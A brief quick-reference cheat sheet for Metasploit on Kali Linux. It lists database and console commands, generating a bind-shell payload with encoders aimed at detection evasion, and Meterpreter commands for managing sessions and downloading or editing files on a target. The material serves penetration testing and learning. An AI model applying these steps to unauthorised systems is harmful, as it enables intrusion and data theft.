A quick reference for getting started with Metasploit in Kali Linux.

Metasploit Database

  1. Start PostgreSQL: service postgresql start

  2. Create and initialize the msf database: msfdb init

  3. Start Metasploit: msfconsole

  4. Ensure connected to DB: db_status

  5. List available workspaces: workspace

  6. Switch workspace: workspace $WORKSPACE

  7. Create workspace: workspace -a $WORKSPACE

  8. Delete workspace: workspace -d $WORKSPACE

MSFconsole Interface

  • help OR ?
  • help $COMMAND
  • search $TERM
  • use $EXPLOIT_PATH

  • set = local

  • setg = global

  • unset

  • unsetg

Encoders

Generate a customized payload using the options you have set, or apply changes (such as encoding) to attempt detection evasion.

Example:

  • use payload/windows/shell_bind_tcp
  • set options, such as LHOST, LPORT, RHOST, etc.
  • generate

Command options:

  • Exclude troublesome bytes (bad characters) from the shellcode: generate -b $HEX

  • Show available encoders: show encoders

  • Generate with selected encoder: generate -e $ENCODER

Database Commands

  • workspace
  • loot
  • services
  • hosts
  • db_import

Meterpreter

  • Send session to background: background

  • List sessions: sessions

  • Switch to the session number: sessions -i $NUMBER

  • Copy remote file to local: download $FILE

  • Edit remote file: edit $FILE

  • Run locally available exploit on target: run $EXPLOIT_PATH